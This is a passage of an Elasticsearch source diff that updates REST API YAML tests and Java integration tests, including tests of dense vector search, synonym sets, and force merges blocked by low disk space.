index: + index: test_index + id: "0" + refresh: true + body: + embedding: [ 0.5, 111.3, -13.0, 14.8, -156.0 ] + + # wait and ensure that the mapping update is replicated + - do: + cluster.health: + wait_for_events: languid + + - do: + indices.get_mapping: + index: test_index + + - match: { test_index.mappings.properties.embedding.type: dense_vector } + - match: { test_index.mappings.properties.embedding.dims: 5 } + + - do: + catch: bad_request + index: + index: test_index + id: "0" + body: + embedding: [ 0.5, 111.3 ] + --- "Updating dim to null is not allowed": - requires: @@ -630,3 +670,36 @@ setup: properties: embedding: type: dense_vector + + +--- +"Searching with no data dimensions specified": + - requires: + cluster_features: "search.vectors.no_dimensions_bugfix" + reason: "Search with no dimensions bugfix" + + - do: + indices.create: + index: empty-test + body: + mappings: + properties: + vector: + type: dense_vector + index: true + + - do: + search: + index: empty-test + body: + fields: [ "name" ] + knn: + field: vector + query_vector: [ -0.5, 90.0, -10, 14.8, -156.0 ] + k: 3 + num_candidates: 3 + rescore_vector: + oversample: 1.5 + similarity: 0.1 + + - match: { hits.total.value: 0 } diff --git a/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/synonyms/40_synonyms_sets_get.yml b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/synonyms/40_synonyms_sets_get.yml index 9d6540c118ce5..9ba66d3100eb1 100644 --- a/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/synonyms/40_synonyms_sets_get.yml +++ b/rest-api-spec/src/yamlRestTest/resources/rest-api-spec/test/synonyms/40_synonyms_sets_get.yml @@ -157,3 +157,33 @@ setup: - match: count: 12 + +--- +"Return empty rule set": + - requires: + cluster_features: [ synonyms_set.get.return_empty_synonym_sets ] + reason: "synonyms_set get api return empty synonym sets" + + - do: + 
synonyms.put_synonym: + id: empty-synonyms + body: + synonyms_set: [] + + - do: + synonyms.get_synonyms_sets: {} + + - match: + count: 4 + + - match: + results: + - synonyms_set: "empty-synonyms" + count: 0 + - synonyms_set: "test-synonyms-1" + count: 3 + - synonyms_set: "test-synonyms-2" + count: 1 + - synonyms_set: "test-synonyms-3" + count: 2 + diff --git a/server/build.gradle b/server/build.gradle index be2b43745d0b2..20557aefba731 100644 --- a/server/build.gradle +++ b/server/build.gradle @@ -12,6 +12,8 @@ apply plugin: 'elasticsearch.publish' apply plugin: 'elasticsearch.internal-cluster-test' apply plugin: 'elasticsearch.internal-test-artifact' apply plugin: 'elasticsearch.test-build-info' +apply plugin: 'elasticsearch.transport-version-references' +apply plugin: 'elasticsearch.transport-version-resources' publishing { publications { diff --git a/server/src/internalClusterTest/java/org/elasticsearch/action/admin/ReloadSecureSettingsIT.java b/server/src/internalClusterTest/java/org/elasticsearch/action/admin/ReloadSecureSettingsIT.java index 83e79ff7f45a8..82a6c1f6acf85 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/action/admin/ReloadSecureSettingsIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/action/admin/ReloadSecureSettingsIT.java @@ -27,6 +27,7 @@ import org.elasticsearch.plugins.PluginsService; import org.elasticsearch.plugins.ReloadablePlugin; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import org.junit.BeforeClass; import java.io.InputStream; @@ -47,6 +48,7 @@ import static org.hamcrest.Matchers.nullValue; @ESIntegTestCase.ClusterScope(minNumDataNodes = 2) +@ESTestCase.WithoutEntitlements // requires entitlement delegation ES-10920 public class ReloadSecureSettingsIT extends ESIntegTestCase { private static final String VALID_SECURE_SETTING_NAME = "some.setting.that.exists"; diff --git a/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/node/tasks/TasksIT.java b/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/node/tasks/TasksIT.java index b2ba1d34e3280..f9651c71ecf13 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/node/tasks/TasksIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/node/tasks/TasksIT.java @@ -41,7 +41,6 @@ import org.elasticsearch.index.query.QueryBuilders; import org.elasticsearch.persistent.PersistentTasksCustomMetadata; import org.elasticsearch.plugins.Plugin; -import org.elasticsearch.search.SearchService; import org.elasticsearch.search.builder.SearchSourceBuilder; import org.elasticsearch.tasks.RemovedTaskListener; import org.elasticsearch.tasks.Task; @@ -82,6 +81,8 @@ import static java.util.Collections.singleton; import static org.elasticsearch.action.admin.cluster.node.tasks.TestTaskPlugin.TEST_TASK_ACTION; import static org.elasticsearch.action.admin.cluster.node.tasks.TestTaskPlugin.UNBLOCK_TASK_ACTION; +import static org.elasticsearch.action.search.SearchQueryThenFetchAsyncAction.NODE_SEARCH_ACTION_NAME; +import static org.elasticsearch.action.search.SearchTransportService.FREE_CONTEXT_SCROLL_ACTION_NAME; import static org.elasticsearch.core.TimeValue.timeValueMillis; import static org.elasticsearch.core.TimeValue.timeValueSeconds; import static org.elasticsearch.http.HttpTransportSettings.SETTING_HTTP_MAX_HEADER_SIZE; @@ -353,8 +354,6 @@ public void testTransportBulkTasks() { } public void testSearchTaskDescriptions() { - // TODO: 
enhance this test to also check the tasks created by batched query execution - updateClusterSettings(Settings.builder().put(SearchService.BATCHED_QUERY_PHASE.getKey(), false)); registerTaskManagerListeners(TransportSearchAction.TYPE.name()); // main task registerTaskManagerListeners(TransportSearchAction.TYPE.name() + "[*]"); // shard task createIndex("test"); @@ -380,6 +379,11 @@ public void testSearchTaskDescriptions() { // check that if we have any shard-level requests they all have non-zero length description List shardTasks = findEvents(TransportSearchAction.TYPE.name() + "[*]", Tuple::v1); for (TaskInfo taskInfo : shardTasks) { + // During batched query execution, if a partial reduction was done on the data node, a task will be created to free the reader. + // These tasks don't have descriptions or parent tasks, so they're ignored for this test. + if (taskInfo.action().equals(FREE_CONTEXT_SCROLL_ACTION_NAME)) { + continue; + } assertThat(taskInfo.parentTaskId(), notNullValue()); assertEquals(mainTask.get(0).taskId(), taskInfo.parentTaskId()); assertTaskHeaders(taskInfo); @@ -396,12 +400,12 @@ public void testSearchTaskDescriptions() { taskInfo.description(), Regex.simpleMatch("id[*], size[1], lastEmittedDoc[null]", taskInfo.description()) ); + case NODE_SEARCH_ACTION_NAME -> assertEquals("NodeQueryRequest", taskInfo.description()); default -> fail("Unexpected action [" + taskInfo.action() + "] with description [" + taskInfo.description() + "]"); } // assert that all task descriptions have non-zero length assertThat(taskInfo.description().length(), greaterThan(0)); } - updateClusterSettings(Settings.builder().putNull(SearchService.BATCHED_QUERY_PHASE.getKey())); } public void testSearchTaskHeaderLimit() { diff --git a/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/state/TransportClusterStateActionDisruptionIT.java b/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/state/TransportClusterStateActionDisruptionIT.java index 9c5d96166b3d6..3098d1d558f99 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/state/TransportClusterStateActionDisruptionIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/state/TransportClusterStateActionDisruptionIT.java @@ -213,7 +213,6 @@ public void runRepeatedlyWhileChangingMaster(Runnable runnable) throws Exception final String nonMasterNode = randomValueOtherThan(masterName, () -> randomFrom(internalCluster().getNodeNames())); awaitClusterState( - logger, nonMasterNode, state -> Optional.ofNullable(state.nodes().getMasterNode()).map(m -> m.getName().equals(masterName) == false).orElse(false) ); diff --git a/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/tasks/PendingTasksBlocksIT.java b/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/tasks/PendingTasksBlocksIT.java index 6475e80901ea7..bb048179a437a 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/tasks/PendingTasksBlocksIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/action/admin/cluster/tasks/PendingTasksBlocksIT.java @@ -12,6 +12,7 @@ import org.elasticsearch.common.settings.Settings; import org.elasticsearch.gateway.GatewayService; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.InternalTestCluster; import java.util.Arrays; @@ -22,6 +23,7 @@ import static 
org.elasticsearch.cluster.metadata.IndexMetadata.SETTING_READ_ONLY; import static org.elasticsearch.cluster.metadata.IndexMetadata.SETTING_READ_ONLY_ALLOW_DELETE; +@ESTestCase.WithoutEntitlements // requires entitlement delegation ES-10920 public class PendingTasksBlocksIT extends ESIntegTestCase { public void testPendingTasksWithIndexBlocks() { diff --git a/server/src/internalClusterTest/java/org/elasticsearch/action/search/TransportSearchIT.java b/server/src/internalClusterTest/java/org/elasticsearch/action/search/TransportSearchIT.java index eab5576707092..89f46bee4b709 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/action/search/TransportSearchIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/action/search/TransportSearchIT.java @@ -12,7 +12,6 @@ import org.apache.lucene.index.LeafReaderContext; import org.apache.lucene.search.ScoreMode; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.DocWriteResponse; import org.elasticsearch.action.admin.cluster.node.stats.NodeStats; @@ -648,7 +647,7 @@ public long bytesToPreallocate() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/internalClusterTest/java/org/elasticsearch/cluster/SpecificMasterNodesIT.java b/server/src/internalClusterTest/java/org/elasticsearch/cluster/SpecificMasterNodesIT.java index 5f86111d352a9..5d5f2082fb71f 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/cluster/SpecificMasterNodesIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/cluster/SpecificMasterNodesIT.java @@ -60,13 +60,15 @@ public void testElectOnlyBetweenMasterNodes() throws Exception { logger.info("--> start master node (1)"); final String masterNodeName = internalCluster().startMasterOnlyNode(); - awaitMasterNode(internalCluster().getNonMasterNodeName(), masterNodeName); - awaitMasterNode(internalCluster().getMasterName(), masterNodeName); + for (var nodeName : internalCluster().getNodeNames()) { + awaitMasterNode(nodeName, masterNodeName); + } logger.info("--> start master node (2)"); final String nextMasterEligableNodeName = internalCluster().startMasterOnlyNode(); - awaitMasterNode(internalCluster().getNonMasterNodeName(), masterNodeName); - awaitMasterNode(internalCluster().getMasterName(), masterNodeName); + for (var nodeName : internalCluster().getNodeNames()) { + awaitMasterNode(nodeName, masterNodeName); + } logger.info("--> closing master node (1)"); client().execute( @@ -74,12 +76,14 @@ public void testElectOnlyBetweenMasterNodes() throws Exception { new AddVotingConfigExclusionsRequest(TEST_REQUEST_TIMEOUT, masterNodeName) ).get(); // removing the master from the voting configuration immediately triggers the master to step down - awaitMasterNode(internalCluster().getNonMasterNodeName(), nextMasterEligableNodeName); - awaitMasterNode(internalCluster().getMasterName(), nextMasterEligableNodeName); + for (var nodeName : internalCluster().getNodeNames()) { + awaitMasterNode(nodeName, nextMasterEligableNodeName); + } internalCluster().stopNode(masterNodeName); - awaitMasterNode(internalCluster().getNonMasterNodeName(), nextMasterEligableNodeName); - awaitMasterNode(internalCluster().getMasterName(), nextMasterEligableNodeName); + for (var nodeName : internalCluster().getNodeNames()) { + awaitMasterNode(nodeName, nextMasterEligableNodeName); + } } public 
void testAliasFilterValidation() { diff --git a/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveCustomsCommandIT.java b/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveCustomsCommandIT.java index 2b2dc114e8ffc..e88a08f983b90 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveCustomsCommandIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveCustomsCommandIT.java @@ -18,12 +18,14 @@ import org.elasticsearch.env.Environment; import org.elasticsearch.env.TestEnvironment; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import java.util.Map; import static org.hamcrest.Matchers.containsString; @ESIntegTestCase.ClusterScope(scope = ESIntegTestCase.Scope.TEST, numDataNodes = 0, autoManageMasterNodes = false) +@ESTestCase.WithoutEntitlements // commands don't run with entitlements enforced public class RemoveCustomsCommandIT extends ESIntegTestCase { public void testRemoveCustomsAbortedByUser() throws Exception { diff --git a/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveIndexSettingsCommandIT.java b/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveIndexSettingsCommandIT.java index 65e325a1291d8..62afa9c57cbaa 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveIndexSettingsCommandIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveIndexSettingsCommandIT.java @@ -21,6 +21,7 @@ import org.elasticsearch.env.TestEnvironment; import org.elasticsearch.plugins.Plugin; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import java.util.Collection; import java.util.List; @@ -31,6 +32,7 @@ import static org.hamcrest.Matchers.not; @ESIntegTestCase.ClusterScope(scope = ESIntegTestCase.Scope.TEST, numDataNodes = 0, autoManageMasterNodes = false) +@ESTestCase.WithoutEntitlements // commands don't run with entitlements enforced public class RemoveIndexSettingsCommandIT extends ESIntegTestCase { static final Setting FOO = Setting.intSetting("index.foo", 1, Setting.Property.IndexScope, Setting.Property.Dynamic); diff --git a/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveSettingsCommandIT.java b/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveSettingsCommandIT.java index d7ed6bb47b98b..1a68211c6ea8e 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveSettingsCommandIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/RemoveSettingsCommandIT.java @@ -19,6 +19,7 @@ import org.elasticsearch.env.Environment; import org.elasticsearch.env.TestEnvironment; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import java.util.Map; @@ -27,6 +28,7 @@ import static org.hamcrest.Matchers.not; @ESIntegTestCase.ClusterScope(scope = ESIntegTestCase.Scope.TEST, numDataNodes = 0, autoManageMasterNodes = false) +@ESTestCase.WithoutEntitlements // commands don't run with entitlements enforced public class RemoveSettingsCommandIT extends ESIntegTestCase { public void testRemoveSettingsAbortedByUser() throws Exception { diff --git a/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/UnsafeBootstrapAndDetachCommandIT.java 
b/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/UnsafeBootstrapAndDetachCommandIT.java index 6e548f773009f..fc6c72ee86984 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/UnsafeBootstrapAndDetachCommandIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/cluster/coordination/UnsafeBootstrapAndDetachCommandIT.java @@ -24,6 +24,7 @@ import org.elasticsearch.gateway.PersistedClusterStateService; import org.elasticsearch.node.Node; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.InternalTestCluster; import java.io.IOException; @@ -39,6 +40,7 @@ import static org.hamcrest.Matchers.notNullValue; @ESIntegTestCase.ClusterScope(scope = ESIntegTestCase.Scope.TEST, numDataNodes = 0, autoManageMasterNodes = false) +@ESTestCase.WithoutEntitlements // CLI tools don't run with entitlements enforced public class UnsafeBootstrapAndDetachCommandIT extends ESIntegTestCase { private MockTerminal executeCommand(ElasticsearchNodeCommand command, Environment environment, boolean abort) throws Exception { diff --git a/server/src/internalClusterTest/java/org/elasticsearch/discovery/single/SingleNodeDiscoveryIT.java b/server/src/internalClusterTest/java/org/elasticsearch/discovery/single/SingleNodeDiscoveryIT.java index 10f13f6ab152f..e28ab5b5c05d5 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/discovery/single/SingleNodeDiscoveryIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/discovery/single/SingleNodeDiscoveryIT.java @@ -87,7 +87,8 @@ public Path nodeConfigPath(int nodeOrdinal) { 0, "other", Arrays.asList(getTestTransportPlugin(), MockHttpTransport.TestPlugin.class), - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); try { other.beforeTest(random()); @@ -137,7 +138,8 @@ public Path nodeConfigPath(int nodeOrdinal) { 0, "other", Arrays.asList(getTestTransportPlugin(), MockHttpTransport.TestPlugin.class), - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); try (var mockLog = MockLog.capture(JoinHelper.class)) { mockLog.addExpectation( diff --git a/server/src/internalClusterTest/java/org/elasticsearch/index/IndexSortIT.java b/server/src/internalClusterTest/java/org/elasticsearch/index/IndexSortIT.java index 0e85d2b9750cb..d76b7d0dd250c 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/index/IndexSortIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/index/IndexSortIT.java @@ -11,6 +11,7 @@ import org.apache.lucene.search.Sort; import org.apache.lucene.search.SortField; +import org.apache.lucene.search.SortedNumericSelector; import org.apache.lucene.search.SortedNumericSortField; import org.apache.lucene.search.SortedSetSortField; import org.elasticsearch.common.settings.Settings; @@ -80,6 +81,33 @@ public void testIndexSort() { assertSortedSegments("test", indexSort); } + public void testIndexSortDateNanos() { + prepareCreate("test").setSettings( + Settings.builder() + .put(indexSettings()) + .put("index.number_of_shards", "1") + .put("index.number_of_replicas", "1") + .put("index.sort.field", "@timestamp") + .put("index.sort.order", "desc") + ).setMapping(""" + { + "properties": { + "@timestamp": { + "type": "date_nanos" + } + } + } + """).get(); + + flushAndRefresh(); + ensureYellow(); + + SortField sf = new SortedNumericSortField("@timestamp", SortField.Type.LONG, true, SortedNumericSelector.Type.MAX); + 
sf.setMissingValue(0L); + Sort expectedIndexSort = new Sort(sf); + assertSortedSegments("test", expectedIndexSort); + } + public void testInvalidIndexSort() { IllegalArgumentException exc = expectThrows( IllegalArgumentException.class, diff --git a/server/src/internalClusterTest/java/org/elasticsearch/index/engine/MergeWithLowDiskSpaceIT.java b/server/src/internalClusterTest/java/org/elasticsearch/index/engine/MergeWithLowDiskSpaceIT.java index c2687468a7f26..1857b7529f6ca 100644 --- a/server/src/internalClusterTest/java/org/elasticsearch/index/engine/MergeWithLowDiskSpaceIT.java +++ b/server/src/internalClusterTest/java/org/elasticsearch/index/engine/MergeWithLowDiskSpaceIT.java @@ -9,30 +9,51 @@ package org.elasticsearch.index.engine; +import org.elasticsearch.action.ActionFuture; +import org.elasticsearch.action.admin.cluster.health.ClusterHealthResponse; import org.elasticsearch.action.admin.cluster.node.stats.NodeStats; import org.elasticsearch.action.admin.cluster.node.stats.NodesStatsResponse; +import org.elasticsearch.action.admin.cluster.reroute.ClusterRerouteUtils; +import org.elasticsearch.action.admin.indices.segments.IndicesSegmentResponse; +import org.elasticsearch.action.admin.indices.segments.ShardSegments; import org.elasticsearch.action.admin.indices.stats.IndicesStatsResponse; +import org.elasticsearch.action.support.broadcast.BroadcastResponse; import org.elasticsearch.cluster.DiskUsageIntegTestCase; import org.elasticsearch.cluster.metadata.IndexMetadata; +import org.elasticsearch.cluster.metadata.Metadata; import org.elasticsearch.cluster.routing.allocation.DiskThresholdSettings; +import org.elasticsearch.cluster.routing.allocation.command.MoveAllocationCommand; +import org.elasticsearch.common.Priority; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.common.util.concurrent.EsExecutors; +import org.elasticsearch.core.TimeValue; import org.elasticsearch.index.IndexNotFoundException; import org.elasticsearch.indices.IndicesService; +import org.elasticsearch.plugins.Plugin; +import org.elasticsearch.plugins.PluginsService; +import org.elasticsearch.telemetry.TestTelemetryPlugin; import org.elasticsearch.test.ESIntegTestCase; import org.elasticsearch.threadpool.ThreadPool; import org.junit.BeforeClass; +import java.util.ArrayList; +import java.util.Collection; +import java.util.List; import java.util.Locale; +import java.util.concurrent.TimeUnit; import java.util.stream.IntStream; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertNoFailures; import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.greaterThan; +import static org.hamcrest.Matchers.iterableWithSize; import static org.hamcrest.Matchers.lessThan; +import static org.hamcrest.Matchers.not; @ESIntegTestCase.ClusterScope(scope = ESIntegTestCase.Scope.TEST, numDataNodes = 0) public class MergeWithLowDiskSpaceIT extends DiskUsageIntegTestCase { + private final TimeValue ACCEPTABLE_RELOCATION_TIME = new TimeValue(5, TimeUnit.MINUTES); protected static long MERGE_DISK_HIGH_WATERMARK_BYTES; @BeforeClass @@ -40,7 +61,14 @@ public static void setAvailableDiskSpaceBufferLimit() { // this has to be big in order to potentially accommodate the disk space for a few 100s of docs and a few merges, // because of the latency to process used disk space updates, and also because we cannot reliably separate indexing from merging // operations at this high abstraction level 
(merging is triggered more or less automatically in the background) - MERGE_DISK_HIGH_WATERMARK_BYTES = randomLongBetween(1_000_000L, 2_000_000L); + MERGE_DISK_HIGH_WATERMARK_BYTES = randomLongBetween(10_000_000L, 20_000_000L); + } + + @Override + protected Collection> nodePlugins() { + List> nodePluginsList = new ArrayList<>(super.nodePlugins()); + nodePluginsList.add(TestTelemetryPlugin.class); + return nodePluginsList; } @Override @@ -155,8 +183,225 @@ public void testShardCloseWhenDiskSpaceInsufficient() throws Exception { }); } + public void testForceMergeIsBlockedThenUnblocked() throws Exception { + String node = internalCluster().startNode(); + ensureStableCluster(1); + setTotalSpace(node, Long.MAX_VALUE); + ThreadPoolMergeExecutorService threadPoolMergeExecutorService = internalCluster().getInstance(IndicesService.class, node) + .getThreadPoolMergeExecutorService(); + TestTelemetryPlugin testTelemetryPlugin = getTelemetryPlugin(node); + // create some index + final String indexName = randomAlphaOfLength(10).toLowerCase(Locale.ROOT); + createIndex( + indexName, + Settings.builder().put(IndexMetadata.SETTING_NUMBER_OF_REPLICAS, 0).put(IndexMetadata.SETTING_NUMBER_OF_SHARDS, 1).build() + ); + ensureGreen(indexName); + // get current disk space usage (for all indices on the node) + IndicesStatsResponse stats = indicesAdmin().prepareStats().clear().setStore(true).get(); + long usedDiskSpaceAfterIndexing = stats.getTotal().getStore().sizeInBytes(); + // restrict the total disk space such that the next merge does not have sufficient disk space + long insufficientTotalDiskSpace = usedDiskSpaceAfterIndexing + MERGE_DISK_HIGH_WATERMARK_BYTES - randomLongBetween(1L, 10L); + setTotalSpace(node, insufficientTotalDiskSpace); + // node stats' FS stats should report that there is insufficient disk space available + assertBusy(() -> { + NodesStatsResponse nodesStatsResponse = client().admin().cluster().prepareNodesStats().setFs(true).get(); + assertThat(nodesStatsResponse.getNodes().size(), equalTo(1)); + NodeStats nodeStats = nodesStatsResponse.getNodes().get(0); + assertThat(nodeStats.getFs().getTotal().getTotal().getBytes(), equalTo(insufficientTotalDiskSpace)); + assertThat(nodeStats.getFs().getTotal().getAvailable().getBytes(), lessThan(MERGE_DISK_HIGH_WATERMARK_BYTES)); + }); + int indexingRounds = randomIntBetween(2, 5); + while (indexingRounds-- > 0) { + indexRandom( + true, + true, + true, + false, + IntStream.range(1, randomIntBetween(2, 5)) + .mapToObj(i -> prepareIndex(indexName).setSource("field", randomAlphaOfLength(50))) + .toList() + ); + } + // the max segments argument makes it a blocking call + ActionFuture forceMergeFuture = indicesAdmin().prepareForceMerge(indexName).setMaxNumSegments(1).execute(); + assertBusy(() -> { + // merge executor says merging is blocked due to insufficient disk space while there is a single merge task enqueued + assertThat(threadPoolMergeExecutorService.getMergeTasksQueueLength(), equalTo(1)); + assertTrue(threadPoolMergeExecutorService.isMergingBlockedDueToInsufficientDiskSpace()); + // telemetry says that there are indeed some segments enqueued to be merged + testTelemetryPlugin.collect(); + assertThat( + testTelemetryPlugin.getLongGaugeMeasurement(MergeMetrics.MERGE_SEGMENTS_QUEUED_USAGE).getLast().getLong(), + greaterThan(0L) + ); + // but still no merges are currently running + assertThat( + testTelemetryPlugin.getLongGaugeMeasurement(MergeMetrics.MERGE_SEGMENTS_RUNNING_USAGE).getLast().getLong(), + equalTo(0L) + ); + // indices stats also says 
that no merge is currently running (blocked merges are NOT considered as "running") + IndicesStatsResponse indicesStatsResponse = client().admin().indices().prepareStats(indexName).setMerge(true).get(); + long currentMergeCount = indicesStatsResponse.getIndices().get(indexName).getPrimaries().merge.getCurrent(); + assertThat(currentMergeCount, equalTo(0L)); + }); + // the force merge call is still blocked + assertFalse(forceMergeFuture.isCancelled()); + assertFalse(forceMergeFuture.isDone()); + // merge executor still confirms merging is blocked due to insufficient disk space + assertTrue(threadPoolMergeExecutorService.isMergingBlockedDueToInsufficientDiskSpace()); + // make disk space available in order to unblock the merge + if (randomBoolean()) { + setTotalSpace(node, Long.MAX_VALUE); + } else { + updateClusterSettings( + Settings.builder().put(ThreadPoolMergeExecutorService.INDICES_MERGE_DISK_HIGH_WATERMARK_SETTING.getKey(), "0b") + ); + } + // wait for the merge call to return + safeGet(forceMergeFuture); + IndicesStatsResponse indicesStatsResponse = indicesAdmin().prepareStats(indexName).setMerge(true).get(); + testTelemetryPlugin.collect(); + // assert index stats and telemetry report no merging in progress (after force merge returned) + long currentMergeCount = indicesStatsResponse.getIndices().get(indexName).getPrimaries().merge.getCurrent(); + assertThat(currentMergeCount, equalTo(0L)); + assertThat(testTelemetryPlugin.getLongGaugeMeasurement(MergeMetrics.MERGE_SEGMENTS_QUEUED_USAGE).getLast().getLong(), equalTo(0L)); + assertThat(testTelemetryPlugin.getLongGaugeMeasurement(MergeMetrics.MERGE_SEGMENTS_RUNNING_USAGE).getLast().getLong(), equalTo(0L)); + // but some merging took place (there might have been other merges automatically triggered before the force merge call) + long totalMergeCount = indicesStatsResponse.getIndices().get(indexName).getPrimaries().merge.getTotal(); + assertThat(totalMergeCount, greaterThan(0L)); + assertThat(testTelemetryPlugin.getLongCounterMeasurement(MergeMetrics.MERGE_DOCS_TOTAL).getLast().getLong(), greaterThan(0L)); + // assert there's a single segment after the force merge + List shardSegments = getShardSegments(indexName); + assertThat(shardSegments.size(), equalTo(1)); + assertThat(shardSegments.get(0).getSegments().size(), equalTo(1)); + assertAcked(indicesAdmin().prepareDelete(indexName).get()); + } + + public void testRelocationWhileForceMerging() throws Exception { + final String node1 = internalCluster().startNode(); + ensureStableCluster(1); + setTotalSpace(node1, Long.MAX_VALUE); + String indexName = randomAlphaOfLength(10).toLowerCase(Locale.ROOT); + createIndex( + indexName, + Settings.builder().put(IndexMetadata.SETTING_NUMBER_OF_REPLICAS, 0).put(IndexMetadata.SETTING_NUMBER_OF_SHARDS, 1).build() + ); + ensureGreen(indexName); + // get current disk space usage (for all indices on the node) + IndicesStatsResponse stats = indicesAdmin().prepareStats().clear().setStore(true).get(); + long usedDiskSpaceAfterIndexing = stats.getTotal().getStore().sizeInBytes(); + // restrict the total disk space such that the next merge does not have sufficient disk space + long insufficientTotalDiskSpace = usedDiskSpaceAfterIndexing + MERGE_DISK_HIGH_WATERMARK_BYTES - randomLongBetween(1L, 10L); + setTotalSpace(node1, insufficientTotalDiskSpace); + // node stats' FS stats should report that there is insufficient disk space available + assertBusy(() -> { + NodesStatsResponse nodesStatsResponse = 
client().admin().cluster().prepareNodesStats().setFs(true).get(); + assertThat(nodesStatsResponse.getNodes().size(), equalTo(1)); + NodeStats nodeStats = nodesStatsResponse.getNodes().get(0); + assertThat(nodeStats.getFs().getTotal().getTotal().getBytes(), equalTo(insufficientTotalDiskSpace)); + assertThat(nodeStats.getFs().getTotal().getAvailable().getBytes(), lessThan(MERGE_DISK_HIGH_WATERMARK_BYTES)); + }); + int indexingRounds = randomIntBetween(5, 10); + while (indexingRounds-- > 0) { + indexRandom( + true, + true, + true, + false, + IntStream.range(1, randomIntBetween(5, 10)) + .mapToObj(i -> prepareIndex(indexName).setSource("field", randomAlphaOfLength(50))) + .toList() + ); + } + // the max segments argument makes it a blocking call + ActionFuture forceMergeBeforeRelocationFuture = indicesAdmin().prepareForceMerge(indexName) + .setMaxNumSegments(1) + .execute(); + ThreadPoolMergeExecutorService threadPoolMergeExecutorService = internalCluster().getInstance(IndicesService.class, node1) + .getThreadPoolMergeExecutorService(); + TestTelemetryPlugin testTelemetryPlugin = getTelemetryPlugin(node1); + assertBusy(() -> { + // merge executor says merging is blocked due to insufficient disk space + assertThat(threadPoolMergeExecutorService.getMergeTasksQueueLength(), greaterThan(0)); + assertTrue(threadPoolMergeExecutorService.isMergingBlockedDueToInsufficientDiskSpace()); + // telemetry says that there are indeed some segments enqueued to be merged + testTelemetryPlugin.collect(); + assertThat( + testTelemetryPlugin.getLongGaugeMeasurement(MergeMetrics.MERGE_SEGMENTS_QUEUED_USAGE).getLast().getLong(), + greaterThan(0L) + ); + // but still no merges are currently running + assertThat( + testTelemetryPlugin.getLongGaugeMeasurement(MergeMetrics.MERGE_SEGMENTS_RUNNING_USAGE).getLast().getLong(), + equalTo(0L) + ); + // indices stats also says that no merge is currently running (blocked merges are NOT considered as "running") + IndicesStatsResponse indicesStatsResponse = client().admin().indices().prepareStats(indexName).setMerge(true).get(); + long currentMergeCount = indicesStatsResponse.getIndices().get(indexName).getPrimaries().merge.getCurrent(); + assertThat(currentMergeCount, equalTo(0L)); + }); + // the force merge call is still blocked + assertFalse(forceMergeBeforeRelocationFuture.isCancelled()); + assertFalse(forceMergeBeforeRelocationFuture.isDone()); + // merge executor still confirms merging is blocked due to insufficient disk space + assertTrue(threadPoolMergeExecutorService.isMergingBlockedDueToInsufficientDiskSpace()); + IndicesSegmentResponse indicesSegmentResponseBeforeRelocation = indicesAdmin().prepareSegments(indexName).get(); + // the index should have more than 1 segments at this stage + assertThat( + 